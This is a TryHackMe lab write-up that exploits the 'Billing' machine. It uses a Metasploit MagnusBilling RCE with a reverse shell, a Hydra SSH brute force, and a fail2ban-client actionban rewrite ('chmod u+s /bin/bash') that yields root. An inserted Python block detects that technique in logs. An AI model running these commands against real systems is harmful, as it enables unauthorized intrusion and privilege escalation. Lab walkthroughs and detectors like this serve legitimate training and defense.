TryHackMe : Billing
Billing is an intentionally vulnerable web application.
Connect the VPN and join the room.
Let’s start with some reconnaissance using the Nmap tool.
nmap -v -sC -sV -A -O -p- -T5 -Pn 10.10.91.206
Let’s check the results.
The open ports are 22 (SSH), 80 (HTTP), 3306 (MySQL) and 5038 (Asterisk), shown in the above screenshot.
I did some directory listing on the web server, but nothing useful was found except the robots.txt file.
The robots.txt shows /mbilling as a disallowed entry. Let’s search for MagnusBilling (mbilling) exploits in Metasploit.
Found an unauthenticated RCE exploit for the MagnusBilling application. Let’s use no. 7, which has the PHP reverse shell payload, and set the module options: RHOSTS (web server IP address), LHOST (tun0, a.k.a. the THM VPN IP address), and LPORT (a random port on the attacker machine for the reverse shell connection).
Finally, run the exploit command.
We have successfully exploited the vulnerable web machine. Let’s read the user flag.
Submit the user flag and let’s start digging into privilege escalation for the root flag. We have to acquire a fully functional shell. Run the command below; it launches an interactive Bash shell.
execute -f bash -i
Then run the command below, which upgrades the previously acquired Bash shell to a fully interactive TTY shell (the -c flag is required so python3 runs the string as code).
python3 -c 'import pty;pty.spawn("/bin/bash")'
I tried visiting directories like /var/backups, /var/log, /tmp, etc., but nothing useful was found. So I ran the command below to list the commands the user can run with sudo privileges.
sudo -l
I found that the fail2ban service (which monitors system logs for malicious activity, such as repeated failed login attempts, and automatically blocks the offending IP addresses by updating firewall rules) can be run by all users with sudo privileges.
I hadn’t tried any exploitation of the fail2ban service previously, so I had to look up some blogs and write-ups related to privilege escalation using the fail2ban service. Some references are mentioned below.
I tried to edit the fail2ban service log and configuration files and it wasn’t successful. So I looked up the switches for the fail2ban client. That’s when I found a switch which edits the iptables-multiport action configuration. The command I used is
sudo fail2ban-client set sshd action iptables-multiport actionban "chmod u+s /bin/bash"
The above command instructs the Fail2ban service to modify the sshd jail's actionban behavior, so that when an IP is banned it also sets the setuid bit on /bin/bash, potentially granting any user executing it root privileges. Once the command is executed, restart the service using the command given below
sudo /usr/bin/fail2ban-client restart
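A defender's check for the technique just described, added here as an example and not part of the original write-up: it scans sudo entries from auth.log for fail2ban-client calls that rewrite a jail action's shell hooks (actionban and friends), and reports shell binaries that have picked up the setuid bit. The log lines, hostname, username and jail/action names below are constructed assumptions for the sample.

```python
import os
import re
import stat
from typing import Dict, List, Tuple

# Constructed sample auth.log lines (not from the original write-up): a benign
# status query, an actionban rewrite, and the restart that activates it.
SAMPLE_AUTH_LOG = """\
Jun 12 10:14:50 billing sudo:   magnus : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client status sshd
Jun 12 10:15:03 billing sudo:   magnus : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client set sshd action iptables-multiport actionban chmod u+s /bin/bash
Jun 12 10:15:09 billing sudo:   magnus : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client restart
"""

# sudo writes "<user> : ... COMMAND=<full command line>" for every run.
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?COMMAND=(?P<cmd>.*)$")
# "set <jail> action <name> <property> <value>": these properties are shell
# snippets fail2ban runs as root, so any change to them deserves an alert.
ACTION_PROPS = {"actionban", "actionunban", "actionstart", "actionstop", "actioncheck"}
SET_ACTION_RE = re.compile(
    r"fail2ban-client\s+set\s+(?P<jail>\S+)\s+action\s+(?P<action>\S+)\s+(?P<prop>action\w+)\s+(?P<value>.*)"
)


def find_action_rewrites(log_text: str) -> List[Dict[str, str]]:
    """Return sudo-executed fail2ban-client calls that change an action's shell hooks."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue
        a = SET_ACTION_RE.search(m.group("cmd"))
        if a and a.group("prop") in ACTION_PROPS:
            findings.append({"user": m.group("user"), "jail": a.group("jail"),
                             "action": a.group("action"), "prop": a.group("prop"),
                             "value": a.group("value").strip()})
    return findings


def has_setuid(mode: int) -> bool:
    """True if the setuid bit is set in a st_mode value."""
    return bool(mode & stat.S_ISUID)


def setuid_shells(paths: Tuple[str, ...] = ("/bin/bash", "/bin/sh", "/bin/dash")) -> List[str]:
    """Return the listed shell binaries that are setuid on this host (none should be)."""
    return [p for p in paths if os.path.exists(p) and has_setuid(os.stat(p).st_mode)]


if __name__ == "__main__":
    for f in find_action_rewrites(SAMPLE_AUTH_LOG):
        print(f"ALERT: {f['user']} rewrote {f['jail']}/{f['action']} {f['prop']} -> {f['value']!r}")
    print("setuid shells on this host:", setuid_shells())
```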
When the fail2ban server is ready, execute the command below
ls -la /bin/bash
The above command shows the attributes of the /bin/bash executable in long-listing form (-l), including hidden entries (-a); this is the listing to compare against after the ban fires.
After all these steps, we have to brute-force the SSH service using any tool. I used Hydra; you can use any wordlist you want.
hydra -l root -P /usr/share/wordlists/john.lst 10.10.91.206 ssh
Once the brute-force attempt is finished, our IP address will be banned in the firewall, which means the previously mentioned actionban command has executed. To confirm this, let’s go to the previously acquired TTY shell and execute the command below
bash -p
The above command executes bash in privileged mode (-p), which keeps the effective UID granted by the setuid bit instead of dropping it.
We have successfully elevated the user privileges to root privileges. Finally, read the root flag and submit it.